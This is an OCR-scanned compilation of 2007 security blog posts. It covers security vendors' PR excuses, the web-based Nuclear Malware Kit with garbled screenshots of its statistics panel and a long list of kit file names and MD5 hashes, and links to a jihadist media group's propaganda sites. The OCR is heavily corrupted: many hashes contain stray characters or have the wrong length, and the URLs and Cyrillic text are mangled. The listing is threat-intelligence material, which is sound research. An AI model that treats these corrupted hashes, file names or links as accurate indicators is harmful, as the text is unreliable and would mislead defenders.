DOES IT PROPRIETARY HEARING FROM VIOLATION OF THE § IRRESPONSIBLE 
THIS WAY ENCRYPTION OUR LAWYERS DMCA 
ALGORITHMS 
PREVENT THAT 


NOTHING IS THAT'S JUST NOBODY IT WOULD BE iF YOU HADNT 
100% SECURE THEORETICAL WILL EVER TOO EXPENSIVE TOLD ANYONE. 
MUMBO.JUMBO TRY TO TO FIX THAT IT WOULD STILL 


This [1]Security Public Relations Excuse Bingo is very entertaining as it objectively provides 
random excuses that security vendors and public companies often use, when not address- 
ing a security issue concerning them, and consequently their customers. You may also find 
Matasano’s [2]Kubler-Ross Model Of Vulnerability Management informative. 


1. http://www. crypto.com/bingo/p 


2. http: //www.matasano.com/log/400/the-kubler-ross-model-of-vulnerability-management/ 
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3.8.15 The Nuclear Malware Kit (2007-08-22 14:11) 


advanennble 


Web based C &C malware kits are already a commodity, and with the source codes of [1]MPack 
and [2]lcePack freely available in the wild, modifications of the kits with far more advanced 
features will sooner or later get released. But what is prompting the botnet masters’ interest 
of a web interface to their fast-flux networks, and in-depth statistics for the infected hosts? 
It’s a results-oriented mindset, and the core objective of achieving [3]malicious economies of 
scale. What does this mean from a psychological point of view? It means that even before 
launching a mass-spreading attack they’ve already anticipated its success so that more 
efforts go to assessing which are the most effective campaigns, countries prone to malware 
infections, and specific browser vulnerabilities used in order for them to tailor even more 
successful attacks in the future. When looking at screenshots of stats like these you realize 
that the browser and client side vulnerabilities in principle are the infection vector of choice, 
especially the unpatched ones, as given the last wide scale IFRAME attacks we’ve seen in the 
past six months, all the malware kits were using outdated browser vulnerabilities, and despite 
that, achieved enormous success. 
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More screenshots of a previous version of the Nuclear Malware Kit - yet another web based C 
&C available for sale : 


CTATUCTUKA 
Cratvctyna STATISTICS }) [ BROWSERS ) [ IP's ) [ CONFIG ) [ CLEANUP } 
—_—— 
Viroro Bpaysepes OCn Crpares 


bpaysep Janpocon NpoGyaon 
msie 444 
"zie 1S 4 


pers 


Bcero sarpocoe: 648 


- Infections per browser 


CTATUCTUKA 
Crarwcrena { STATISTICS ][ BROWSERS )[ IP's ] [ CONFIG ] [ CLEANUP } 
——— 
Viroro Epaysepes och Ctpares 
Bepcws Janpocos Npofwson 


Boero sanpocoe: 648 


- Infections per OS 
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inc.header.php 
3d472ceb5dd4dd7b064955dbfd32c20f 
inc.headerhtml.php 
ac474df5708a5cad281559a5227fa31f 
inc.headerphp.php 
f5749875d2cd80dfb749ecd24c2aad1c 
style.css 
859babad221958b7921e42c1280c5b46 
index.html 

lib.csource.php 
fa3de712c50483725bf3a052be/7bd5cf 
lib.functions.php 
lda3afe63039fc610249c4f15c32e410 
lib. placeholder.php 
55860e1f632eacleb5afa8800abc01d9 
404.php 
107eb004d6270551f906f42cd1laa063e 
admin.php 
5e74b6c670ce9f887384f6lffc2ffica 
antihack.php 
32aadbff3c801893adff6b2ff063c73b 
config.php 
2d94a5ce21c5988a0802d69f951707c8 
CSS.CSS 
f40e22adae7d5e5dbd91215974bb83cl1 
db.sql 
98de80ffdabe7642f99cd291779826b1 
exploits.php 
b2ed75502e5bfe15f8339611a74e7c48 
expl _ff.php 
927b526487fb2f9acldb29a2a16dc338 
expl _ie.php 
825bca367b41cb9aba809e46cc2bd97e 
expl _ie6.php 
8ebde9aab8323f61c9644a5720184a4a 
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expl ie6 adodb.php 

expl _ie6 adodb.php.txt 
b53e5c289e97f73ace0c0a53b825e815 
expl ie6 mdac.php 
53257ac38a449084cccfe5e474e0106b 
expl ie6 _wvf.php 
6beaeb18ab47f5d3c9bc9af722c6bb0a 
expl _ie7.php 
14223db61398264edf147f4d83cb082b 
expl _o7.php 
da7402ab51430cf40e2d6a8457d49e76 
expl o09.php 

158d5b19e2a0868af5 7aaa39fbc48c0c 
functions.php 
9369d16f9ce8ec452ba30f65082964c4 
geoip.dat 
f51882cb93dafdf2e67bc876f4e025aa 
geoip.php 
314dc55609866bfcae8e98c894eee5 3f 
hit.php 
4ab95732d6c17c4e16f218f6fd2346ef 
html _admin.php 
d79e5392b4e734186ebcd1ba4bb3b94b 
html _admin _go.php 
ba28fdc233495efcb380b7a7f1259180 
html _panel.php 
647d31e69b5e4f4b564a0ee9acefbe90 
html _panel _all.php 
7bee8e3e6c4edcd9c129dec44c3b3050 
html panel _browsers.php 
97aa26338b221e5da21ccf7e6cda2cf2 
html panel _clear.php 
30bfc6115851a1403226eflelfab12b8 
html _panel _countries.php 
1b9b1f74b4e363128af936a34e8e4e2d 
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html panel _footer.php 
8d358fb41e23cfb9532d58c314629800 
html panel _go.php 

f359f9f3 laf8d629feal9f696aff0665 
html panel header.php 
5743d716fd228ada3396e7ab36d97163 
html _panel _os.php 
1e91b2c098371f629161b6d63231c09d 
html panel _referers.php 
7618fd7656f63f7f94a3d88a9Cc43bc7a 
image _bg.gif 
664f814695e6d246c96af33d893f32d8 
image _bg2.png 
59529613caf9699e44762e7aaddc1497 
image box _1px.png 
3fd05bca21f965a38ba9b8dbe3fea93b 
image box _bb.png 
a70e69ef880f2fE5b90f47 1ab6ff13b8e 
image _box _bl.png 
fde97200221cd598e50a0a015cce923e 
image box _br.png 
0101c304a4026044a69b6ec1889f45e4 
image box _cl.png 
14d87becfd90c0a4ac8290466c0c1c75 
image box _cr.png 
a015ce3689541dfdc88b784f28730363 
image box _tb.png 
8197f80d4d0d78a6c1965al11fbd613bc 
image box _tl.png 
427691284b728de45c68da784af3d15d 
image _box _tr.png 
d40431ab541fcb5ab3eb94987a02e5cb 
image _input.gif 
fd092e0236a12e072936729423d0cce9 
image __left.png 
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5aebb0980422b5e00acf298519af01lae 

image __login.gif 
c6b405e740e25f6f5c60dc2b5759028e 

image logo.gif 
5220568a5799f7172e87c09e95ead347 

image _right.png 
015f19666b4b06a502ffed3b65d0e6db 

img _button.png 
2612ef6fc6db1e2a56b5b73497100419 
index.php 

6547 9fdf5fb6a918686a7b21b3ab5e20 
install.php 
2552a1b5157b60d103cc65454045637e 
load.php d64la6e06bbe5f2213f66ab9fc5e8510 
panel.php 
0c773d5615c1c522a2d9f8952efe92e4 
showflag.php 
a7119104b3823fd90cca5ceacdOfb2e2 

stat.php cb6525a4252f00d0fcd7d3d6cd5b087e 
TODO.txt 8a3el1d0af785db5ad80cd3db19bedd96 
vars.php 485041d76ef5db7e5a19760f016652ce 
get.php 

21b8e8a90998cbc1f55a532adeaf4659 
inc.config.php 
c59999c2dc17a0d2c3a07c3b97dc1d0d 
index.php 
60630164282f0746fa691846dd5743d6 
mysqldb.sq| 
9ee3507cb60e4b60c4bd313032e33851 
ReadMe.txt 
101c46a04079cb29b39b9c9a7e89eca8 

change _pass.php 
62bb8b56d3c1cd195963022fef5caea4 

clear _db.php 
d9101271f0e4093d1970515857090279 
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help.php ObOaaf130c642275fa324606c840ced0 
index.php 
2fc516d3856ee0116250781fc0a79dfb 

ip _stat.php 
40e241c3a2f59aad03753f5445a41911 

lang.php 99928aece6d41c447aa98b666c5a6fd1 
login.php 

1948fac64fdcc387b8fccdd231d06d8f 
logout.php 
621b0fd4737d48378de7e142e5a09ee0 

user manager.php 
3c455e714fbd7c8148d6247810f5360a 


ad.gif 
b6b1e9619ed7289fba573e8d889d3819 
ae.gif 
b42e6f37ba2e059876e9cad6c8afbd98 
af.gif 
ccaf2f8cd19e558d2cb925e37b120f20 
ag.gif 
f60877160a45fe086b5943d487144b23 
ai.gif 
e9f155a292785d401d472c25a2735f39 
al.gif 
2379c017b4858d90f900b3564a88b72e 
am.gif 
6a2e3d4ac7139f1665ec85daf905c4fb 
an.gif 
3felba098d2bd5f85c996ea0a5d7dd5a 
ao.gif 
3a30af9a98cf20e6619eeE234e8c7f929 
aq.gif 
23507525ab4e7d1023a3a6940790d9c6 
ar.gif 


2940a84a15b26e5ee37fa29a89947228 
as.gif 
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e56e28dec792c71b32cb7299ebd83751 
at. gif 
cadc74036384cda59ee91d99bdcfdd69 
au. gif 
b91b6739c8107e29680568ef8ff952f9 
aw. gif 
8e91812abcd372b3a32e7c16c15dd8ed 
az.gif 
64c82a7cafccd37a526f7745b915b8aa 
ba.gif 
1c8a23d4d9ed0f8decf5eea261e631b5 
bb. gif 
ae7aadd035a40e5026a777e2ecdbd5f5 
bd.gif 
5349673c83420f65faac21f9ee14a7d2 
be.gif 
€2697c0d2f33f4c8ca85dac762734cfc 
bf. gif 
d10e907a9fb8487940f6c5d350dde6ae 
bg. gif 

f6e51fba28e2744b67 8ffd752d75f945 
bh. gif 
b8aeb3f5a24a277ea6c826cd4113e2ee 
bi.gif 
fe5f4500cf4baefld65a424e8d5689bc 
bj.gif 
97af4afce5fd166559201493f6848c47 
bm.gif 
06045f155dd3b1d22cd28b86e57de479 
bn.gif 
43948655b170b8e063f023620d97c76b 
bo.gif 
9c4ef78c1b8051c0038227e04705c871 
br.gif 
667c1c786e5365ealff2c5lbaed8e6a7 
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bs. gif 
1bc0alb6cf00a50bb9bf3588d84b321¢c 
bt.gif 
995226c86da889b77ee9fa9c60bee399 
bv. gif 
e023614ca4df2ed1be0dacf9f736826a 
bw.gif 
d4232256a8374cff569021c5351301be 
by. gif 
23f79b7553f5cdcc90f3bcelf7feld0c 
bz.gif 
2ab46e28a4d3084d7620e0aaecf4c235 
ca.gif 
c1c24f48ac653bf3f07423fd1i2ecd11f 
cd.gif 
b74241ecd992051a41c456f3e6ec2ad3 
cf.gif 
fdd15d7a37c8e885b731d6f7c8c67dc6 
cg.gif 
62a3129d39d66d648580fbeeflfce60f 
ch.gif 
a9aa4db50f1d232d494610110455e98d 
ci.gif 
0f8d3618f8a62d914f0f792a83c2c687 
ck. gif 
edafceaaf10f5f387523fd27915628e7 
cl.gif 

65341 ffddf87323b55fdff8bb115bc75 
cm.gif 
1bb0670559a2676fd42dfdef3a7b1b/7f 
cn.gif 
12a79273092a0a93adbfe9b685634e5f 
co.gif 
966dc7ed9306794734a2e61438f89744 
cr.gif 
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c5fa3319590501d12afd4e16b4ed81b0 


cu.gif 
a40b55eeca54fe5605f06d194b179d3a 
cv.gif 
d26c9fc27103d723586ba616057460dd 
cy.gif 
d8dd4cfcd2570984219c9826d417ee9a 
cz. gif 
3c706c7f9d3bb30ae2df290c8a9be3e7 
de. gif 
1f31389417402bf187e3276579adcfcl 
dj.gif 
c7bf7379f87e9aac8c045ed3bf58da23 
dk.gif 
8337faebf55a6e5b297aff95517147a9 
dm.gif 
6f33e31ac969168d9431cc865001a21a 
do.gif 
d50d679037a133f49533abd436aac790 
dz.gif 
fd8b3e3a882012c111c387b4a24c201b 
ec. gif 
6d213134a8af6250fe5b269d16b52967 
ee. gif 
3e3f7d30e9e58b2c98f6f5d7f7be1l64c 
eg.gif 
9600de10fc4779b7873d463e4a5188e9 
er.gif 
238dde43e7077fade86597999e6046c2 
es. gif 
4fc4c91dbb8012db776af9b476c4elcd 
et. gif 
737dc12da78a0b27b999544a41b8c954 
eu. gif 


6a257a89ee638d66865664ee968ff7 2c 
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CTATHCTHKA 


Cratuctexa STATISTICS BROWSERS 1°"s CONFIG CLEANUP 


Viroro Boaysepe: OCH Tphartps 


Crpana sanpocop Npobunon 


- Infections per country 


Related posts: 

[4]The Black Sun Bot - web based malware 
[5]The Cyber Bot - web based malware 
[6]Malware Embedded Sites Increasing 
[7]Botnet Communication Platforms 
[8]OSINT Through Botnets 

[9]Corporate Espionage Through Botnets 


ttp://ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 


ttp://ddanchev.blogspot.com/2007/07/icepack-malware-kit-in-action.htm 


. http: //ddanchev. blogspot .com/2007/03/underground- economys-supply-of-goods .htm 


ttp://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_7672.htm 


ttp://ddanchev.blogspot.com/2007/04/shots-from-malicious-wild-west-sample_20.htm 


_hetp:/ /ddanchev.blogspot.con/2001/0T/aaluare- embedded sites- increasing. heal 
| http:/ /ddanche, blogspot .con/2007 /03/botnet~conmunication-platforns. neal 
_hetp:/ /adanchev blogspot .con/2007/0d/osknt~through-botnets. nea 

. http: //ddanchev. blogspot . com/2007/05/corporate-espionage-through~ botnets .html 


OONAUARWNEH 
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fi.gif 
Oaae04dbd30720f6bd155ce7840910e3 
fj.gif 
a825cdf6cdc75877a2748201e0d14874 
fk.gif 
a2d83821d143ce2c35e48c9e9ef021e4 
fm.gif 
5cbe429c604ede636f93f9e3e65d2d3e 
fo.gif 
adc678b55e16ee1c8e4363e1fd764086 
fr.gif 
7f66797472eb9360e0bd22bfcfb9delf 
ga.gif 
96de40e3362ec03980171a6b347755e4 
gb.gif 
93cb87bcf85c3b2756f6b296494cbc37 
gd.gif 
83810a8a9a36dfla42a7e2df644b07e2 
ge.gif 
ac87f86413d9e214be3de0d3820cfla7 
gh.gif 
6e506c781480alef5eb80a5f415c300a 
gi.gif 
26f676e5676155claal278e3c0e2ede6 
gl.gif 
220ba9d5444b958512cf8c14e6f3664d 
gm.gif 
6b71edef56d177266bd076cda58def7e 
gn.gif 
c07acd5a538c11ec4933de155b5341a2 
gp.gif 
d12f295c5396a57c3ca27de5e46b1f94 
gq.gif 
303063fca23a70f425dc923ce3f34b30 
gr.gif 
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cee23846c8603623882ed5134406806c 
gt.gif 
9b5e92154496a88f1cal1064845497 7af 
gu. gif 
d8ee6ee605a30ddadafb179000f1le62b 
gw. gif 
7008cdb584b4983fbf7458de392f3b82 
gy.gif 
e0745abf42d852da0588adeab822c002 
hk.gif 
83301f5dfebf29cd5aca49a6272240c8 
hm.gif 
3a24264185daf6e8c307d523a544e5ac 
hn.gif 
99b20f53c38c2f36de5677946e7cb042 
hr.gif 
39cac2f2e2e6a9f41f89026442287682 
ht. gif 
99b88b35b9310162500f187da64b579e 
hu. gif 
3212a65eba5018fdee554234c45fb5ff 
id.gif 
a3fe271b1dec3d96fd3cebce6591c840 
ie.gif 
d0101b97df3644ac8ef40780ca5cdf8b 
il. gif 
ce092caal539ae185ae407fbc543cd5c 
im.gif 

in.gif 
3f042¢528c4bf957777be35f6b18c691 
io.gif 
35b9c8f05cObce96ae295cd97997bb43 
iq.gif 
43a114c7298e15308378fe959f94f3ed 
ir.gif 
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2a8da57126b658e256ce5b93c6949b83 


is.gif 
142622e0042666bac6eebeaf8c8e53ec 
it. gif 
72b0c360b078e4b7d58840c12ec89525 
je.gif 
64dcc7081f35b7c08f4eacf253ebe3e0 
jm.gif 
b71f782c24a3caf90d61119fc2a03ade 
jo.gif 
9ee5f4d1e42146b658b84b3ddd99119c 
jp.gif 
531e4982260e50c173872d32553b9d91 
ke.gif 
27481845c6081487f2b67fc7754f8944 
kg.gif 
202b1977ecf77a413b7565ada8el26fa 
kh. gif 
10324ab7e6a04171269da2092333d4e6 
ki.gif 
3367e0e37cf04ef726ed4f31cbb255b1 
km.gif 
17361663c32c0a3571775c60f54b5861 
kn.gif 
c5a0cc06a7a96c002b2aa69C85b128a0 
kp.gif 
83172c1241cad924321c27151533316d 
kr.gif 
27b12726647e7e783763ad85fbf407c5 
kw.gif 
f58f3613420bee6129e2967e18989839 
ky. gif 
cc6c838c50ec7d1lec09f4c59537f2c05 
kz.gif 


C9a29f216dc2aeb3f73f7b50b77a4b4f 
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la.gif 
66ac74583c1859ea55fe34a81c73c304 
lb.gif 
6b7a372934ffc86493ae4daadaa67501 
Ic.gif 
4ff65704775e685024c149a9b86787e0 
li.gif 
7cffdd4b033b2e5534789c0471a291ee 
Ik. gif 
d9eee6b3fcc3d011b684d422ccfd6e38 
Ir.gif 
€2623c89857fd31be09af4f4f713b73c 
Is.gif 
bcbb085a5dff8f8e84cb04a140281745 
It. gif 
d4487bf9895cfba14176c57f966050a3 
lu.gif 
€333c2b38ad7dbec56be0ea95460al2c 
lv.gif 
514de74dc630c59838c4406dbc6f3815 
ly.gif 
ad9d25d33cfa64c074d4afce1944a7a3 
ma.gif 
a64b6726eecb6c97cdc7d9e99F97F58b 
mc.gif 
b078930a4bc2282c3669e0af905513dd 
md.gif 
d10c62b50e2d991f4229d01613bf64ba 
mg.gif 
1fd3270525bef3c2209e0a3bcfcef238 
mh.gif 
65cb04da9b025288c09d06208b748581 
mk.gif 
8046e9ba9370efa3c5f7312000d0a608 
ml.gif 
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82a7c7d6956cfaa9ec2f2b0b679d15al 
mm.gif 
25009266f5706ef498422ad4b41b5cla 
mn.gif 
75afb51335f3a965ff7f1b4435c6828c 
mo.gif 
8b4d9ee4b065403e3efa837ab3fc3d79 
mp.gif 
£7536c02354a2aa29ad117a0e317046b 
mq.gif 
31a6497822781lafecafcO8efdb911459 
mr.gif 
09c5b268ee3421d9a36330ecal8f27ed 
ms.gif 
639022bebfa4985f543eb4c7c55cb4c9 
mt. gif 

b630e0faea7c9db8 7aeef9cae912d573 
mu.gif 
938ac0665ff92512fd5clle4b99eaabd 
mv.gif 
45aaaab68ef5628a951laaf7a8465c78e 
mw. gif 
2da84fc76988ed6d3d09d46d6d71d6dd 
mx.gif 
d3d43f8b958739b00582aa117b7b0d5f 
my.gif 
809e20fabeadfa4f6dfaf629bfe32786 
mz.gif 
169b88a2d2e2b61074725cafcdb02137 
na.gif 
7879034a66005c6362f2dd6e76006903 
nc.gif 
1891dd4e9799a25058fe59c2ae6bcab6c 
ne.gif 
9f8f0b3e38b4b388cd1a876991632f25 
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nf. gif 
76521b2845914c88e6ae0d70623d1fdd 
ng.gif 
d97fe7f8986ada525dc000848a63f904 
ni.gif 
97196c326f4192d80fb0370c2eb14bd3 
nl.gif 
96199acdb50773fe45dfdbc31078ea4c 
no.gif 
d98132d9186daf717fea60b515391dbb 
np. gif 
563b2a18cc772e8152588f1593e62296 
nr.gif 
43990e2c126fd5fa663ebff4aeb7abe9 
nz.gif 
3156460b6b5711d6eed7f7d8cc2ab5a7 
om.gif 
82a30a1754878742cc4f2d53a321bb18 
pa.gif 
2cb5e6357313398ff7769acdc246d5a5 
pf. gif 
fod8fc23d9eba2d1e25bd045bbe460a0 
pg.gif 
f8640f7168928cb4186fcOb3ffe91975 
ph.gif 
cec4d7560e2d08926359d2e87 7f3a76c 
pk.gif 
5cb1ff3e37207a760e2ecf45a5bb81d7 
pl.gif 
a929046f3f0c7781989a284371a7f43b 
pm.gif 
82147e98807c03773c0b68356172814d 
pr.gif 
b4c3c92d6f14d845e5bd6ef808992e75 
ps.gif 
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ed8543ef592caa4d4a0ca3b636d52449 


pt.gif 
ae548aa692ef71a331afe943026e111d 
pw.gif 
6a3alfc0O91aa71fc473277a02dccdd2c 
py. gif 
479edce4532bd36f766bd29a346ee0c2 
qa.gif 
6ad5b83645bf557fe570894f453f432a 
re.gif 
61864922b44209614eae99f8a83da65c 
ro.gif 
ac04fb14afaae3bc4449a5401c3517e0 
ru.gif 
daa2a635125539998a491f04ce53dc60 
rw.gif 
87a0642d680c7ac4ae82a86c6850e80a 
sa.gif 
bbd932aea9265abf5815b74dd9446de4 
sb.gif 
C41690739c4f92af9e065e81690a2356 
sc.gif 
70b6c4f0F7bab3090a45cc9a8668e92F 
sd.gif 
aef2c6903b36e52b667bb0baa52604fc 
se.gif 
63ff75c06900689a5d43ab931bc82662 
sg.gif 
d89f586fb81c9a9cf9cdf95013F73908 
si.gif 

4f311a4b0a39db339be7 4a2f354d3799 
sk.gif 
01d603424483cf66ca867ba0flc9fec4 
SI.gif 


a8al1ca018798069590c0f8cb5796fc65 


10109 


sm.gif 
6330955519623fed6262d632956c66e0 


sn.gif 
14faa28a0e44dfc2727dfe228ee84a34 
so. gif 
5d8348e7a2fal302ff6a4a3fod2bfea6 
sr.gif 
cb7f3cc497f4067d09a0d61070c937ff 
st.gif 
d0889a94d96bee4541ea661e7e3b6626 
sv.gif 
1930fal4df40af4fd6ab9d60db7al3ed 
sy.gif 
73380e84dc753e6cfd5b3d19219024d3 
Sz.gif 
6ec7660bea2f18ffc26555f43d0f6ad8 
tc. gif 
5d456951dcf4eb341117c87857a20848 
td.gif 
c20e167cd531be6237422594b4072cd8 
tf.gif 
444a919ef49a1170cf6abf766f067054 
tg.gif 
6aa920611047a1bc48d722a896ae9466 
th. gif 
b525712cc1014c12071aa555b29d9654 
Thumbs.db 
73192a66bc2e7196ac196ef24c39fe75 
tj.gif 
ac1c06b195a17e9408472c15a5c086cd 
tm.gif 
42d945e3bce87e24a005ac96f7 79aeb7 
tn.gif 
f7d1ccddc14b1b2754f19c5eb2d51a56 
to.gif 
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1ee074e0dbbb595647270dbced8a8743 


tp.gif 
e€668c8b8a6f7668410c90fffb7c4d8ab 
tr.gif 
23c0420906ac063753138c20bacd3ela 
tt.gif 
87decec956e1fc484b1a8b1716326b25 
tv. gif 
67e92c1c2cd1222fd607c9f91435883e 
tw.gif 
cf5c19a25cb1dd17f9d47b362d98e0a4 
tz.gif 
ef039d9935ecda27125f0fd39212ad44 
ua.gif 
1cc325bedc5df0920efedda54a184fdc 
ug.gif 
174636bd284c8d7f06638767bb84b6fd 
uk.gif 
39526cd54b55fba7910702d6a0061c90 
um.gif 
4546517ece394c3c8a22f8b7ed54ad81 
us. gif 
a5a63b0486b82f067e8cfcbf254a989b 
uy. gif 
275a0eccdca2720e84afa23054b5d371 
uz.gif 
9bb72b0eaaee6bab1de26f9b53624a86 
va.gif 
4fccba188125599f6448f8e0b71d0677 
vc.gif 
bc56207f7daf99ac171e85c3ca85e43b 
ve.gif 
f1082562cd7ee5776e6e732cc7220889 
vg.gif 


5f89b155213d1c29181d06da33a974f8 
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vi.gif 
b30d88bf20ffc5c75a254ab25b4c562c 
vn.gif 
5bf8dfaf74506f3d89aa4ab6fd9c4e211 
vu.gif 

b1924aea4986245f3c6e7 70e8de1b843 
ws.gif 
a027ff7cdd02b873d271f8d5lab89ae8 
ye.gif 
ee7fb77f702f0182de807f188138a152 
yu. gif 
6a7e5foc9e3ac06b720eea3387477771 
za.gif 
37d219e52bce3b94891821896c71699a 
zm.gif 
al6bced0ab9ae9b874d4c0c35c36b918 
zr.gif 
c66f4e607dbc3158243360d69856f827 
zw. gif 
8d31cf8ee73d6c4e8fdd3c8382d01549 
Thumbs.db 
409b33e6713363836123fd833121c4f5 
vote _middle.gif 
31bbd8b3354f3370d3e4378393af1074 
iconbluarw.gif 
91add62ac978f82640bb2a7e6e51da7f 
iconbluarwdbl.gif 
389b0cf405761a535284603ee3858c84 
iconbluarwdblr.gif 
d4d3ea80294dfc7329b6b/7da34dff66a 
iconbluarwr.gif 
91b03cb3e6781lafbfe50764cae84092a 
icongryarw.gif 
3f21b9f11137cc5f709005264f36685e 
icongryarwdbl.gif 
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3.8.16 GIMF - "We Will Remain" (2007-08-24 12:16) 


Welcome 
to 
the Global Islamic Media Front’ s 
website 


After having [1]both of its blogs [2]shut down, the Global Islamic Media Front issued a modest 
statement "[3]Global Islamic Media Front: We were and will remain". But of course - however 
in banner form only. Here’re two [4]more GIMF related URIs of [5]a sexy layout in progress, 
[6]a propaganda flash, and an article related to the [7]Middle East Media Research Institute 
(MEMRI). 


http: //ddanchev. blogspot .com/2007/07/gimf-switching-blogs.htm 
ttp://ddanchev. blogspot .com/2007/08/gimf-now-permanent1ly- shut-down. htm 


http: //inshallahshaheed. wordpress. com/2007/08/20/global-islamic-media-front-we-were-and-will-remain/ 


1. 

2. 

3. 

4 
5. i 

6. 

7. 


ttp://gimf .123.fr/ 
ttp://fares-james.bizhat.com/GIMF-falas6een-tunadekum. swf 


http: //news . yahoo. com/s/weeklystandard/20070801/cm_weeklystandard/unwelcomeinternetguests 


3.8.17 Distributed WiFi Scanning Through Malware (2007-08-24 12:42) 


[1] 
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148397e0a2442d180e45cd6958b007e2 
icongryarwdblr.gif 
Obleeb34f57e0ab628fea56b07873536 
icongryarwr.gif 
Of1fd118e5a2d46aa076c9e5890abe72 
Thumbs.db 
f9f444F7c9elee793ef1400ae69f2aal 
inc.footer.php 
d580abb41lebab18c22afc15681a4669a 
inc.header.php 
3d472ceb5dd4dd7b064955dbfd32c20f 
inc.headerhtml.php 
ac474df5708a5cad281559a5227fa31f 
inc.headerphp.php 
f5749875d2cd80dfb749ecd24c2aad1c 
style.css 
859babad221958b7921e42c1280c5b46 
index.html 

lib.csource.php 
fa3de712c50483725bf3a052be/7bd5cf 
lib.functions.php 
lda3afe63039fc610249c4f15c32e410 
lib. placeholder.php 
55860e1f632eacleb5afa8800abc01d9 
!readme.txt 
9a099038a996e1b15e9c13416d977080 
check.php 
1bd1d3a5cd5096d96c6f616146556143 
clear.php 
C1f5b084423044987174229f346de854 
configure.php 
aebce20dd9fe5c857c24b4c74bb71bfe 
eiframe.php 
dc76766e6057161c4a15edbb2c480485 
exploit.php 
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96000b683f280296e9e184e841521fb2 
exploits.php 
840d51fe23cd71ec54102c66a5d881cd 
geterror.php 
cd0bd37455c2a4484f24dc99e9fd9cca 
iframe.php 
ad13cd371f6e670e4a6742de4f7b309d 
ignore.php 
a9969balab6b9252caf28d8749f338b2 
index.exe 
aef304cc6bb1245d6d607fe25d38cdda 
index.php 
fd0de02d01962d58d173ed3c83e33f0c 
js.php 
2f50f98cccOaf2cded6e70e40a47f7b1 
languages.php 
823e8598b087cda2f2d279096596f7be 
referers.php 
€d378156f6f32237f505cbff1311b767 
upload.php 
e€382408beb8c135be8a2448c98a3728d 
screen.css 
c2afedf5755321181bf7fclaceac5e59 
«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
sploit.html 

986347a875e9f8ed5 7dbfa7876d12a90 
-.gif 
552b02f3ee27badc9436c5b7d2170f3e 
ad.gif 
6d1aa633a8097b961bda2f5f735f35a7 
ae.gif 
f212f62ad8f9209e58345eaffae81115 
af. gif 
7110571f5f22f1942ee97afa41f51e61 
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ag.gif 
49068e672834658b179cd86a35325e47 
ai.gif 
5ff25d17bfde13c3a09961d87b04clba 
al.gif 
02c223e7f2c1d4f98553d6167b723cb2 
am.gif 
33b02876d7e0dadfa94db32443dda36e 
an.gif 
caf5f4429cf5a5d91a457385460d9c38 
ao.gif 
c5088908713d6679c0c36d225769c732 
ar.gif 
9c95874961754b638a20b39ce7696Ff31 
as.gif 
b58f58ac2f16e7d81f1480875a8e33c0 
at.gif 
eeb91d7617243cadbe646b6d795c678f 
au.gif 
1fe85ab1104e05f5a26efa5bbcd1cf18 
aw.gif 
65ed67b97141c58ea652416ab83f2676 
ax.gif 
6calb9ad68066fa5dd253e05acf85496 
az.gif 
b1646ac4434f234d8d5034606a7af947 
ba.gif 
53dfab82eedc9f915dd7413blacdd8cb 
bb.gif 
a4e2a530aaaa28ecfe7a63f3b6081871 
bd.gif 
12e3055f52cf6a1551d4146b2ef8bf34 
be.gif 
595a78d8e7caadfee854dd2f15e22093 
bf.gif 
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207fcec4143ee2d33d81bf24fd2e93fb 
bg. gif 
5be202b067ced9053affd880754fcf63 
bh. gif 
5411780a3d43531laae0b66eec250467c 
bi.gif 
2c7cf6b75c5fe88be53237ce6b9ba709 
bj.gif 
da5abd9ecc82282cd8dfa8507d72b19d 
bm.gif 
foa77982d567bc1892c2b64d6ef47a81 
bn.gif 
87b3432e4df98e0b73673ac910f01010 
bo.gif 
Ob8ef2f7302d078461e47676119c08ab 
br.gif 
92858b17e2d5b63d040104586ff52302 
bs. gif 
72ba741ab39307b5639ef2ba4bd96fe7 
bt.gif 
36d740145ed89f4a02fc483baed1323a 
bv.gif 
bbc9011e876a122ea89923e6b730ec50 
bw. gif 
d841ce1d195d470bdddb1c478039c050 
by.gif 
f90504a0c446c69ebf3031a0c6f7ea81 
bz. gif 
035793a3b9079e171leesf5f81bda9cc7 
ca.gif 
71ad31lefd4e749a2e23b706c15db73ae 
cc.gif 
94a9202e2d3618f0d788e5f2d54323c6 
cd.gif 
abeaé2ffce5cf4cb744a2d6355f4c21a 
10116 


cf.gif 
€885f0438ba36f1f4787bb603f99c8F3 
cg.gif 
6ff3d64b899ee3c52af74134dd405424 
ch.gif 
ed43f66bc567ac6954adf9e949aede86 
ci.gif 
8ed1d6c276ae7964928ae032c2b9acal 
ck. gif 
af275b38413317a7b23bdf799dd567c7 
cl.gif 
78d55180619241a9df9cccf6e3d9f6f3 
cm.gif 
8ald0e21ed2ec1be609574a473493031 
cn.gif 
b04190e287f32d56867cd6ac53fdedcb 
co.gif 
405dfe11225ebe1cc34b30ccd765753e 
cr.gif 
bd762e1a0567e38bcaeale9b3956b6c1 
cs.gif 
be7111c8a514d660850c92d217b7860e 
cu.gif 
03d19d686d0e21a037cbcbca332ececO 
cv.gif 
a6bfe2d82321df4314f181154080b78c 
cx.gif 
ac0b5e80669c0e7f7fcf6d577d7d5df4 
cy.gif 
649f116f7c7c2f0524d6428eaal 7ad6c 
cz.gif 
6352cbfac37d53fd10f6948e8b9a4ac8 
de.gif 
bOdbdccflc4e4a267a5cd2bf7ea4cb69 
dj.gif 
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30bd321e11df6356b73eaa21fb183eae 
dk.gif 
d7c2fddc4b0a9c6ca3d5e2ed13374421 
dm.gif 
efcf65d93c1713cc052dec2e0883b877 
do.gif 
9389aa6eb9859b2a7b00843482847356 
dz.gif 
e8da7d880886bf815ad641b7cd0b7f9c 
ec.gif 
4b82d78f2a20846b268f28caac6a4ab4 
ee. gif 
7¢09d14f7681e967ea10d4fa2a8f0ecde 
eg. gif 
99dd064303f1d69989789038e8d60020 
eh.gif 
043ce3f2f09f6ee41984a83757365ela 
england.gif 
331d7734597f1lb86e1dba8b569707be8 
er.gif 
509ed59423d395c2c73f2e4f815dbaeb 
es. gif 
cOddb5b02a4d2c4d274140a6cffc4be0 
et. gif 
b738a5aca0b4b4c05a6c745380fcf222 
fam.gif 
190106f196e51bf0c41a6961c189610b 
fi.gif 
94e7d08c3043f3dc65b4eff40223d4e8 
fj.gif 
3a839ddc795a643dad5c6cfa83f9721F 
fk.gif 
21884f77423cbf8eb4b86f61399345b0 
fm.gif 
013d4b6246bd2158f9d9bc685be72840 
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fo.gif 
